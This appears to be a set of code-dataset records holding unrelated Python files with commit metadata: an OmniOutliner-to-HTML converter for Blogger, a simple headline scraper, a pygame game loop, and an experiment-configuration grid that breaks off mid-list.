# converting OO3 to fit html block of blogger
#
#
# Copyright 2008 Omni Development, Inc. All rights reserved.
#
# Omni Source Code software is available from the Omni Group on their
# web site at www.omnigroup.com.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# Any original copyright notices and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# $Header: svn+ssh://source.omnigroup.com/Source/svn/Omni/trunk/Staff/wvh/Helpify/OOhelpify.py 106832 2008-11-15 02:21:21Z wvh $
# informally-assigned version number: 1.2
import sys, os, shutil, re, commands, codecs
from xml.dom.minidom import parseString
reload(sys)
sys.setdefaultencoding('utf-8')
TEXT_NODE = 3
IMAGE_PATH = "" # "HelpImages/"
COMPANY_URL = "www.example.com"
bookTitle = ""
attachments = {}
links = []
anchors = []
doNavi = True
outputPath = ""
tab_spc = 4
styles = []
styles_level_start = 2
span_levels = ['']
pre_style = "background-color: #EEEEEE; border: #444444 1px solid; font-size: 80%"
def scrubAnchor(text):
anchor = re.sub('<span class="Drop">.*?</span>', '', text)
anchor = re.sub('\&.*?\;', '', anchor)
anchor = re.sub('<.*?>', '', anchor)
anchor = re.sub('\W', '', anchor)
return anchor
def fileHeader(tehFile, title, robots="", isTop=False, url="", description=""):
"""Print to a file the stuff we need at the top of an HTML document."""
title = re.sub('<.*?>', '', title).strip()
topString = ""
if isTop:
topString = """<meta name="AppleTitle" content="%(title)s">
""" % {
'title': title
}
print >> tehFile, """<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>%(title)s</title>
%(topString)s
%(robots)s
<meta name="description" content="%(description)s">
<link rel="stylesheet" href="help.css" type="text/css">
</head>
<body>""" % {
'title': title,
'topString': topString,
'robots': robots,
'description': description
}
def fileFooter(tehFile):
"""Print to a file the stuff we need at the bottom of an HTML document."""
print >> tehFile, """
</body>
</html>"""
def fileFrames(tehFile, title, anchor):
"""Write to a file the frameset to hold a table of contents."""
print >> tehFile, """<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta name="robots" content="noindex">
<title>%(title)s</title>
<link href="help.css" rel="stylesheet" media="all">
</head>
<frameset cols="170,*">
<frame name="left" noresize src="%(anchor)s.html">
<frame name="right" noresize src="empty.html">
<noframes>
No frames.
</noframes>
</frameset>
</html>
""" % {
'title': title,
'anchor': anchor
}
def digItem(tehItem, level, inheritedStyle=[], destReached=False):
output = ''
applicableStyles = []
divStyles = []
itemStyles = findStyles(tehItem)
while len(itemStyles) < 2:
itemStyles.append([])
if itemStyles[0]: applicableStyles.extend(itemStyles[0])
if inheritedStyle: applicableStyles.extend(inheritedStyle)
possibleDivStyles = ['Pro', 'Box', 'Destination', 'Anchor', 'Pre']
for oneStyle in possibleDivStyles:
if oneStyle in applicableStyles:
divStyles.append(oneStyle)
applicableStyles.remove(oneStyle)
#if not len(applicableStyles): applicableStyles = ['plain']
#print applicableStyles
preness = None
if 'Pre' in divStyles:
preness = 'Pre'
text = itemText(tehItem, preness)
anchor = ""
if destReached: #we're already at the destination; we're just filling in the text of the page.
if 'Anchor' in divStyles:
output += """<a name="%s"></a>""" % (scrubAnchor(itemText(tehItem)).lower())
if scrubAnchor(itemText(tehItem)).lower() not in anchors:
anchors.append(scrubAnchor(itemText(tehItem)).lower())
else:
output += " " + " "*level + '<div class="item %s">' % (' '.join(divStyles))
if text:
output += '<span class="%(classes)s">%(text)s</span>' % {
'classes': ' '.join(applicableStyles),
'text': text
}
for childrenNode in findSubNodes(tehItem, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
subText = digItem(itemNode, level+1, itemStyles[1], destReached=True)
output += subText['text']
output += " " + " "*level + "</div>\n"
if 'Pre' in divStyles:
output = "<pre>" + output + "</pre>"
text = output #send back all of the text of the contained nodes, formatted properly
else: #we're not at the destination yet; we need to make a sub-page for this item.
anchor = scrubAnchor(text)
if "Destination" in divStyles:
destReached = True
newFileName = anchor + '.html'
level2File = open(outputPath + '/' + newFileName, 'w')
roboString = """<meta name="robots" content="noindex">"""
if destReached:
roboString = ""
elif level == 2:
divStyles.append("toc-left")
else:
divStyles.append("toc-right")
abstract = ""
# turn the note into an abstract; suppress this if your notes are still notes :D
for noteNode in findSubNodes(tehItem, 'note'):
for textNode in findSubNodes(noteNode, 'text'):
for pNode in findSubNodes(textNode, 'p'):
for runNode in findSubNodes(pNode, 'run'):
for litNode in findSubNodes(runNode, 'lit'):
abstract += litNode.toxml('utf-8')
abstract = re.sub('<.*?>', '', abstract).strip()
fileHeader(level2File, text, roboString, isTop=False, url=newFileName, description=abstract)
print >> level2File, """
<div class="%(classes)s">
<h2>%(text)s</h2>
""" % {
'classes': ' '.join(divStyles),
'text': text
}
subTextList = [] # time to look at all the children of this node
for childrenNode in findSubNodes(tehItem, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
subTextList.append(digItem(itemNode, level+1, itemStyles[1], destReached))
#print subTextList
if destReached:
for subText in subTextList:
print >> level2File, subText['text']
else:
for subText in subTextList:
target = "_top"
#if level >= 2 and not subText['destination']:
# target = "right"
frameness = ''
print >> level2File, '<p><a href="%(anchor)s.html" target="%(target)s">%(text)s</a></p>' % {
'anchor': subText['anchor'] + frameness,
'target': target,
'text': subText['text']
}
print >> level2File, """
</div>
"""
#make a navi thingy; suppress this stuff if you are going to index, then emit the help again with the links in it
if doNavi:
prevAnchor = ""
prevTitle = ""
if tehItem.previousSibling and tehItem.previousSibling.previousSibling:
prevTitle = itemText(tehItem.previousSibling.previousSibling)
prevAnchor = scrubAnchor(prevTitle)
nextAnchor = ""
nextTitle = ""
if tehItem.nextSibling and tehItem.nextSibling.nextSibling:
nextTitle = itemText(tehItem.nextSibling.nextSibling)
nextAnchor = scrubAnchor(nextTitle)
print >> level2File, """
<div class="bottom-nav">
"""
if prevAnchor:
print >> level2File, """
<span class="left-nav"><a href="%(anchor)s.html">← %(title)s</a></span>
""" % {
'anchor': prevAnchor,
'title': prevTitle
}
if nextAnchor:
print >> level2File, """
<span class="right-nav"><a href="%(anchor)s.html">%(title)s →</a></span>
""" % {
'anchor': nextAnchor,
'title': nextTitle
}
# <a href="top.html">Top ↑</a>
print >> level2File, """
<br/>
</div>
"""
#end navi thingy
fileFooter(level2File)
result = {}
result['anchor'] = anchor
result['text'] = text
result['destination'] = destReached
return result
def findSubNodes(tehParent, kind): # get all child nodes with certain tagName
foundNodes = []
for subNode in tehParent.childNodes:
if (subNode.nodeType != TEXT_NODE) and (subNode.tagName == kind):
foundNodes.append(subNode)
return foundNodes
def itemText(tehItem, style=None): # find out the text of an item and send it back nicely formatted for html and css
constructedText = u''
for valuesNode in findSubNodes(tehItem, 'values'):
for textNode in findSubNodes(valuesNode, 'text'):
for pNode in findSubNodes(textNode, 'p'):
for runNode in findSubNodes(pNode, 'run'):
runStyles = []
linkage = False
for styleNode in findSubNodes(runNode, 'style'):
for inheritedStyleNode in findSubNodes(styleNode, 'inherited-style'):
runStyles.append(inheritedStyleNode.getAttribute('name'))
if "Link" in runStyles:
runStyles.remove("Link")
linkage = True
if runStyles:
constructedText += '<span class="%s">' % (" ".join(runStyles))
for litNode in findSubNodes(runNode, 'lit'):
for leaf in litNode.childNodes:
leafText = evaluateLeaf(leaf)
if linkage:
constructedText += """<a href="help:anchor='%(anchor)s' bookID='%(bookTitle)s'">%(text)s</a>""" % {
'anchor': scrubAnchor(leafText).lower(),
'bookTitle': bookTitle,
'text': leafText
}
if scrubAnchor(leafText).lower() not in links:
links.append(scrubAnchor(leafText).lower())
else:
constructedText += leafText
if runStyles:
constructedText += '</span>'
if style == 'Pre':
constructedText += '\n'
return constructedText
def evaluateLeaf(tehElement): # find out if an element is text or attachment and send back the appropriate html
if (tehElement.nodeType == TEXT_NODE):
htmlText = unicode(tehElement.toxml())
htmlText = re.sub("""“""", "“", htmlText)
htmlText = re.sub("""”""", "”", htmlText)
htmlText = re.sub("""‘""", "‘", htmlText)
htmlText = re.sub("""’""", "’", htmlText)
return htmlText
elif (tehElement.tagName == 'cell'):
if tehElement.getAttribute('href'):
return '<a href="%(href)s">%(name)s</a>' % {
'href': tehElement.getAttribute('href'),
'name': tehElement.getAttribute('name')
}
else:
fileName = attachments[tehElement.getAttribute('refid')]
fileName = re.sub("\d*__\S*?__", "", fileName)
extension = fileName.split('.')[-1].lower()
if extension == 'png' or extension == 'jpg' or extension == 'gif':
return '<img src="%s" class="inline-image">' % (IMAGE_PATH + fileName)
else:
return '<a href="%(fileName)s">%(name)s</a>' % {
'fileName': fileName,
'name': tehElement.getAttribute('name')
}
def findStyles(tehElement):
"""returns list of lists; inside list represents styles; outside list represents stack levels"""
itemStyles = []
for styleNode in findSubNodes(tehElement, 'style'):
nextStyle = []
for inheritedStyleNode in findSubNodes(styleNode, 'inherited-style'):
nextStyle.append(inheritedStyleNode.getAttribute('name'))
itemStyles.append(nextStyle)
return itemStyles
def findStyleValues(styleNode):
styleValues = {}
for styleVal in findSubNodes(styleNode, 'value'):
kk = styleVal.getAttribute('key')
vv=''
for leaf in styleVal.childNodes:
evv = evaluateLeaf(leaf)
if evv and evv.strip(): vv += evv
styleValues[kk] = vv
# print " %(key)s:%(val)s" % {'key':kk, 'val':vv}
named_styles = []
for styleVal in findSubNodes(styleNode, 'inherited-style'):
named_styles.append(styleVal.getAttribute('name'))
if len(named_styles)>0: styleValues['named_styles']=named_styles
return styleValues
def main():
if len(sys.argv) >= 2:
global outputPath
inputPath = sys.argv[1]
if inputPath[-1] == '/':
inputPath = inputPath[0:-1]
inputTitle = inputPath.split('/')[-1].split('.')[0]
outputPath = inputPath + '/../%s/' % (inputTitle)
if not os.access(outputPath, os.F_OK):
os.mkdir(outputPath)
if not os.access(outputPath + '/HelpImages', os.F_OK):
os.mkdir(outputPath + '/HelpImages')
if os.access(outputPath + '/../help.css', os.F_OK):
shutil.copyfile(outputPath + '/../help.css', outputPath + '/help.css')
if os.access(outputPath + '/../Icon.png', os.F_OK):
shutil.copyfile(outputPath + '/../Icon.png', outputPath + '/HelpImages/Icon.png')
print inputPath+"\n"
f = codecs.open(inputPath + '/contents.xml', 'r', 'utf-8')
xmlString = f.read().encode('utf-8')
tehTree = parseString(xmlString)
f.close()
docNode = tehTree.documentElement
#print tehTree.documentElement.tagName
#print tehTree.documentElement.getAttribute('crap')
rootNode = None
for oneNode in findSubNodes(docNode, 'root'):
rootNode = oneNode
style_attr_idx = 0
for styleElem in findSubNodes(rootNode, 'style'):
print "[%(idx)s]" % {'idx':style_attr_idx}
ss = findStyleValues(styleElem)
for i in ss:
print " %(key)s=%(val)s" % {'key':i, 'val':ss[i]}
style_attr_idx=style_attr_idx+1
for attachmentsNode in findSubNodes(docNode, 'attachments'):
for attachmentNode in findSubNodes(attachmentsNode, 'attachment'):
if attachmentNode.getAttribute('href'):
attachments[attachmentNode.getAttribute('id')] = attachmentNode.getAttribute('href')
if attachmentNode.getAttribute('href').find("__#$!@%!#__") == -1: ## get rid of INSANE outliner dupe files
shutil.copyfile((inputPath + '/' + attachmentNode.getAttribute('href')), outputPath + (IMAGE_PATH=="" and "" or '/'+IMAGE_PATH+'/') + attachmentNode.getAttribute('href'))
#This is where the files get generated. If we are adding navigation links, then generate the pages once without navi links for indexing, then once more with the navi links. If we are not adding navi, then just generate the pages once and index them.
naviIterations = [False]
if doNavi:
naviIterations = [False, True]
for oneNaviIteration in naviIterations:
for oneNode in rootNode.childNodes:
if (oneNode.nodeType != TEXT_NODE) and (oneNode.tagName == 'item'):
text = itemText(oneNode, 'title')
global bookTitle
bookTitle = text
tocFile = open(outputPath + '/top.html', 'w')
fileHeader(tocFile, bookTitle, """<meta name="robots" content="noindex">""", isTop=True, url='top.html')
print >> tocFile, """
<div class="top-all">
<div class="top-left">
<img src="%(imagePath)sIcon.png" alt="Application Icon" height="128" width="128" border="0">
<h1>%(bookTitle)s</h1>
<p><a href="http://%(url)s">%(url)s</a></p>
</div>
<div class="top-right">
""" % {
'imagePath': IMAGE_PATH,
'bookTitle': bookTitle,
'url': COMPANY_URL
}
for childrenNode in findSubNodes(oneNode, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
subText = digItem(itemNode, 2, [])
frameness = ''
#if not subText['destination']:
# frameFile = open(outputPath + '/' + subText['anchor'] + 'frame.html', 'w')
# fileFrames(frameFile, subText['text'], subText['anchor'])
# frameness = 'frame'
print >> tocFile, '<p><a href="%(anchor)s.html">%(text)s</a></p>' % {
'anchor': subText['anchor'] + frameness,
'text': subText['text']
}
print >> tocFile, """
</div>
</div>
"""
fileFooter(tocFile)
tocFile.close()
# create a help index on the iteration that has no navi
#if not oneNaviIteration:
# print commands.getoutput("""/Developer/Applications/Utilities/Help\ Indexer.app/Contents/MacOS/Help\ Indexer %s""" % (outputPath.replace(' ', '\ ')))
# check that all links are hooked up
links.sort()
anchors.sort()
anchorlessLinks = []
for oneLink in links:
if oneLink not in anchors:
anchorlessLinks.append(oneLink)
if len(anchorlessLinks):
print "\n_______Anchorless Links_______"
for oneLink in anchorlessLinks:
print oneLink
#print "\n_______All Links______________"
#for oneLink in links:
# print oneLink
#
#print "\n_______All Anchors____________"
#for oneAnchor in anchors:
# print oneAnchor
print "\n"
else:
print "Congratulations, all links are hooked up!"
else:
print """usage:
python OOhelpify.py OutlinerFile.oo3"""
def findHeadingType(style):
if style is not None and style.has_key(u'heading-type(com.omnigroup.OmniOutliner)'):
return str(style[u'heading-type(com.omnigroup.OmniOutliner)'])
return 'default'
def hasGrandChild(tehItem):
grandchild = False
for childrenNode in findSubNodes(tehItem, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
gchild = findSubNodes(itemNode, 'children')
if gchild and len(gchild)>0:
grandchild = True
break
if grandchild: break
return grandchild
def hasChild(tehItem):
child = False
child = findSubNodes(tehItem, 'children')
if child and len(child)>0:
child = True
return child
def digItem2(tehFile, tehItem, level, passed_style=None):
items = 0
grandchild = hasGrandChild(tehItem)
#print "Grandchild: "+str(grandchild)
for childrenNode in findSubNodes(tehItem, 'children'):
text = ''
level_style = None
if level+styles_level_start < len(styles): level_style = styles[level+styles_level_start]
passed_heading = findHeadingType(passed_style)
level_heading = findHeadingType(level_style)
parent_heading = 'None'
if passed_heading!='default': parent_heading=passed_heading
elif level_heading!='default': parent_heading=level_heading
# print " "*level+'parent heading: '+str(parent_heading)
itemStyles = findStyles(tehItem)
parent_preness = None
for preItemStyles in itemStyles:
if u'Pre' in preItemStyles: parent_preness = 'Pre'
span_level = None
if level+1 <= len(span_levels): span_level = span_levels[level]
spc = " "*tab_spc*(level-len(span_levels))
pairs = []
for itemNode in findSubNodes(childrenNode, 'item'):
child_pairs = []
curr_style = None
child_style = None
style_idx = 0
preness = None
itemStyles = findStyles(itemNode)
if 'Pre' in itemStyles: preness = 'Pre'
else: preness = parent_preness
for styleElem in findSubNodes(itemNode, 'style'):
eval_style = findStyleValues(styleElem)
if style_idx==0: curr_style = eval_style
elif style_idx==1: child_style = eval_style
style_idx += 1
if not preness and eval_style.has_key('named_styles'):
if 'Pre' in eval_style['named_styles']: preness = 'Pre'
heading = findHeadingType(curr_style)
# print "current: "+heading
if heading=='default': heading = parent_heading
if preness=='Pre':
print >> tehFile, "<pre style=\"%s\">" % pre_style
pairs.append("</pre>")
elif span_level is not None:
if len(span_level)==0:
# tehFile.write(spc+"<p>")
if not hasChild(itemNode): child_pairs.append("<br/>\n")
else:
if items==0:
if heading in ['Legal','Numeric']:
tehFile.write(spc+"<ol>")
pairs.append("</ol>\n")
elif grandchild:
tehFile.write(spc+"<ul>")
pairs.append("</ul>\n")
else:
tehFile.write("<div>")
pairs.append("</div>\n")
else:
if heading not in ['Legal','Numeric'] and not grandchild:
print >> tehFile, "<br/>"
text = itemText(itemNode, preness)
if preness=='Pre': text = text.strip()
print text
# print " "*level+"["+str(level)+"] "+str(heading)+": "+text
if preness=='Pre':
tehFile.write(spc+text.strip())
elif span_level is not None:
if len(text)>0:
if len(span_level)==0:
if hasChild(itemNode):
tehFile.write(spc+text.strip())
else:
tehFile.write(spc+text.strip()+child_pairs[0])
child_pairs.pop()
elif heading in ['Legal','Numeric']:
print >> tehFile, spc+"""<span style="%(style)s">%(idx)s. %(text)s</span>""" % {'style':span_level, 'text':text, 'idx': items+1}
else:
print >> tehFile, spc+"""<span style="%(style)s">%(text)s</span>""" % {'style':span_level, 'text':text}
else:
if heading in ['Legal','Numeric'] or grandchild:
tehFile.write(spc+"<li>"+text.strip())
else:
tehFile.write(spc+text.strip())
childs = digItem2(tehFile, itemNode, level+1, child_style)
if len(child_pairs)==1:
tehFile.write(child_pairs[0])
child_pairs.pop()
elif span_level is None:
if preness=='Pre':
pass
elif heading in ['Legal','Numeric'] or grandchild:
if childs>0: print >> tehFile, spc+"</li>"
else: print >> tehFile, "</li>"
items += 1
pairs.reverse()
for pair in pairs:
tehFile.write(pair)
# print >> tehFile, pair
return items
def main2():
if len(sys.argv) >= 2:
global outputPath
inputPath = sys.argv[1]
if inputPath[-1] == '/':
inputPath = inputPath[0:-1]
inputTitle = inputPath.split('/')[-1].split('.')[0]
outputPath = inputPath + '/../%s/' % (inputTitle)
if not os.access(outputPath, os.F_OK):
os.mkdir(outputPath)
if not os.access(outputPath + '/HelpImages', os.F_OK):
os.mkdir(outputPath + '/HelpImages')
print inputPath+"\n"
f = codecs.open(inputPath + '/contents.xml', 'r', 'utf-8')
xmlString = f.read().encode('utf-8')
tehTree = parseString(xmlString)
f.close()
docNode = tehTree.documentElement
#print tehTree.documentElement.tagName
#print tehTree.documentElement.getAttribute('crap')
rootNode = None
for oneNode in findSubNodes(docNode, 'root'):
rootNode = oneNode
style_attr_idx = 0
for styleElem in findSubNodes(rootNode, 'style'):
print "[%(idx)s]" % {'idx':style_attr_idx}
ss = findStyleValues(styleElem)
styles.append(ss)
for i in ss:
print " %(key)s=%(val)s" % {'key':i, 'val':ss[i]}
style_attr_idx=style_attr_idx+1
for attachmentsNode in findSubNodes(docNode, 'attachments'):
for attachmentNode in findSubNodes(attachmentsNode, 'attachment'):
if attachmentNode.getAttribute('href'):
attachments[attachmentNode.getAttribute('id')] = attachmentNode.getAttribute('href')
if attachmentNode.getAttribute('href').find("__#$!@%!#__") == -1: ## get rid of INSANE outliner dupe files
shutil.copyfile((inputPath + '/' + attachmentNode.getAttribute('href')), outputPath + (IMAGE_PATH=="" and "" or '/'+IMAGE_PATH+'/') + attachmentNode.getAttribute('href'))
for oneNode in rootNode.childNodes:
if (oneNode.nodeType != TEXT_NODE) and (oneNode.tagName == 'item'):
text = itemText(oneNode, 'title')
global bookTitle, outFile
bookTitle = text
outFile = open(outputPath + '/index.html', 'w')
fileHeader(outFile, bookTitle, """<meta name="robots" content="noindex">""", isTop=True, url='top.html')
print text
print '*'*50
digItem2(outFile, oneNode, 0)
fileFooter(outFile)
outFile.close()
else:
print """usage:
python OOblogger.py OutlinerFile.oo3"""
if __name__ == "__main__":
main2()
|
[
"tcchou@tcchou.org"
] |
tcchou@tcchou.org
|
a152bc78bddc4bf1c731156309bbc5506185b2ed
|
8392b68623f8ad3f7f7c362d6feb5580d71c3be5
|
/learn/basic_scraper.py
|
d891de0bb9b52c61fe0e6c2ade32a9c7384dd9ac
|
[
"MIT"
] |
permissive
|
postsent/unsw_course_filter
|
27350e3196864a61d8b7287ec9a6f8013cdefa4a
|
b58cb3d6f3fb4fb84e2031be6c6511fb5b9c343f
|
refs/heads/main
| 2023-05-04T12:43:55.198273
| 2021-01-01T08:13:30
| 2021-01-01T08:13:30
| 318,668,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 495
|
py
|
from bs4 import BeautifulSoup
import requests
url_verge = "https://www.theverge.com/tech"
#url = "http://ethans_fake_twitter_site.surge.sh/"
response = requests.get(url_verge, timeout=5)
content = BeautifulSoup(response.content, "html.parser")
#print(content) # print out all html for the wepage
tweet = content.findAll('h3', attrs={"class":"c-entry-box-base__headline"}) # here class == c-entry...
for i, t in enumerate(tweet):
print(t.text)
print()
if (i == 3): break
#print(tweet)
|
[
"junyu.wei@student.unsw.edu.au"
] |
junyu.wei@student.unsw.edu.au
|
10d9feda10195e4480c5d4c1b50b0c75a74a8007
|
564b4b834516512b9b129781d2b19ae33aebd99a
|
/src/main.py
|
e9ff6e96c05a3765fe7c922d62db94221d69eb29
|
[] |
no_license
|
nuclearkittens/reindeer-road
|
941db18639adc8be33375ca865e57fc7a56cff3a
|
9b3f71465109cb3c7db9717c8df82262505bdce2
|
refs/heads/master
| 2023-06-12T03:50:57.857684
| 2021-07-04T11:47:30
| 2021-07-04T11:47:30
| 382,577,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,478
|
py
|
import sys
import os
import pygame as pg
from config import SCREEN_W, SCREEN_H, SCREEN_CAPTION, SKY_COLOUR, MUSIC
from util import initialise_display, check_events
from view import View
from car import Car
class MainGame:
def __init__(self):
pg.init()
self._clock = pg.time.Clock()
self._display = initialise_display()
self._view = View(2)
self._car = Car()
self.look_out = False
self.car = True
def game_loop(self):
running = True
pg.mixer.music.load(MUSIC)
pg.mixer.music.play(loops=-1)
while running:
running, clicked = check_events()
if self.car:
action = self._car.update(self._display, clicked)
if action:
self.car = False
if action == 'window':
self.look_out = True
if self.look_out:
self._display.fill(SKY_COLOUR)
self._view.render_view(self._display)
back = self._view.go_back(self._display)
if back and clicked:
self.look_out = False
self.car = True
pg.display.update()
self._clock.tick(60)
self.car = False
self.view = False
pg.mixer.music.stop()
pg.mixer.music.unload()
pg.quit()
sys.exit()
if __name__ == '__main__':
g = MainGame()
g.game_loop()
|
[
"meri.saynatkari@gmail.com"
] |
meri.saynatkari@gmail.com
|
d80f9f71c158eff29e2074d719a4f038dfc10f15
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/Wyx_w_M_w_Sob_to_Wz_focus/Sob_Wxy/Sob_k25_s001_EroM_Mae_s001/pyr_Tcrop256_p60_j15/pyr_3s/L8/step11_L2345678.py
|
543c1203989ffd14a032598f8a48aa53aacf6b50
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,765
|
py
|
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
###############################################################################################################################################################################################################
# 按F5執行時, 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ 才可 import step10_a.py 喔!
code_exe_dir = os.path.dirname(code_exe_path) ### 目前執行 step10_b.py 的 dir
if(os.getcwd() != code_exe_dir): ### 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~
os.chdir(code_exe_dir)
# print("current_path:", os.getcwd())
###############################################################################################################################################################################################################
import Exps_7_v3.doc3d.Wyx_w_M_to_Wz_focus.pyr_Tcrop256_pad20_jit15.pyr_0s.L8.step10_a as L8_0side
import Exps_7_v3.doc3d.Wyx_w_M_to_Wz_focus.pyr_Tcrop256_pad20_jit15.pyr_1s.L8.step10_a as L8_1side
import Exps_7_v3.doc3d.Wyx_w_M_to_Wz_focus.pyr_Tcrop256_pad20_jit15.pyr_2s.L8.step10_a as L8_2side
import step10_a as L8_3side
#################################################################################################################################################################################################################################################################################################################################################################################################
########
# 1side_1
########
ch032_1side_1__23side_all = [
[L8_1side.ch032_1side_1 , L8_3side.empty , ],
[L8_2side.ch032_1side_1__2side_1 , L8_3side.ch032_1side_1__2side_1__3side_1 , ],
]
########
# 1side_2
########
ch032_1side_2__23side_all = [
[L8_1side.ch032_1side_2 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_2__2side_1 , L8_3side.ch032_1side_2__2side_1__3side_1 , L8_3side.empty , ],
[L8_2side.ch032_1side_2__2side_2 , L8_3side.ch032_1side_2__2side_2__3side_1 , L8_3side.ch032_1side_2__2side_2__3side_2 , ],
]
########
# 1side_3
########
ch032_1side_3__23side_all = [
[L8_1side.ch032_1side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_3__2side_1 , L8_3side.ch032_1side_3__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_3__2side_2 , L8_3side.ch032_1side_3__2side_2__3side_1 , L8_3side.ch032_1side_3__2side_2__3side_2 , L8_3side.empty , ],
[L8_2side.ch032_1side_3__2side_3 , L8_3side.ch032_1side_3__2side_3__3side_1 , L8_3side.ch032_1side_3__2side_3__3side_2 , L8_3side.ch032_1side_3__2side_3__3side_3 , ],
]
########
# 1side_4
########
ch032_1side_4__23side_all = [
[L8_1side.ch032_1side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_1 , L8_3side.ch032_1side_4__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_2 , L8_3side.ch032_1side_4__2side_2__3side_1 , L8_3side.ch032_1side_4__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_3 , L8_3side.ch032_1side_4__2side_3__3side_1 , L8_3side.ch032_1side_4__2side_3__3side_2 , L8_3side.ch032_1side_4__2side_3__3side_3 , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_4 , L8_3side.ch032_1side_4__2side_4__3side_1 , L8_3side.ch032_1side_4__2side_4__3side_2 , L8_3side.ch032_1side_4__2side_4__3side_3 , L8_3side.ch032_1side_4__2side_4__3side_4 , ],
]
########
# 1side_5
########
ch032_1side_5__23side_all = [
[L8_1side.ch032_1side_5 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_1 , L8_3side.ch032_1side_5__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_2 , L8_3side.ch032_1side_5__2side_2__3side_1 , L8_3side.ch032_1side_5__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_3 , L8_3side.ch032_1side_5__2side_3__3side_1 , L8_3side.ch032_1side_5__2side_3__3side_2 , L8_3side.ch032_1side_5__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_4 , L8_3side.ch032_1side_5__2side_4__3side_1 , L8_3side.ch032_1side_5__2side_4__3side_2 , L8_3side.ch032_1side_5__2side_4__3side_3 , L8_3side.ch032_1side_5__2side_4__3side_4 , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_5 , L8_3side.ch032_1side_5__2side_5__3side_1 , L8_3side.ch032_1side_5__2side_5__3side_2 , L8_3side.ch032_1side_5__2side_5__3side_3 , L8_3side.ch032_1side_5__2side_5__3side_4 , L8_3side.ch032_1side_5__2side_5__3side_5 , ],
]
########
# 1side_6
########
ch032_1side_6__23side_all = [
[L8_1side.ch032_1side_6 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_1 , L8_3side.ch032_1side_6__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_2 , L8_3side.ch032_1side_6__2side_2__3side_1 , L8_3side.ch032_1side_6__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_3 , L8_3side.ch032_1side_6__2side_3__3side_1 , L8_3side.ch032_1side_6__2side_3__3side_2 , L8_3side.ch032_1side_6__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
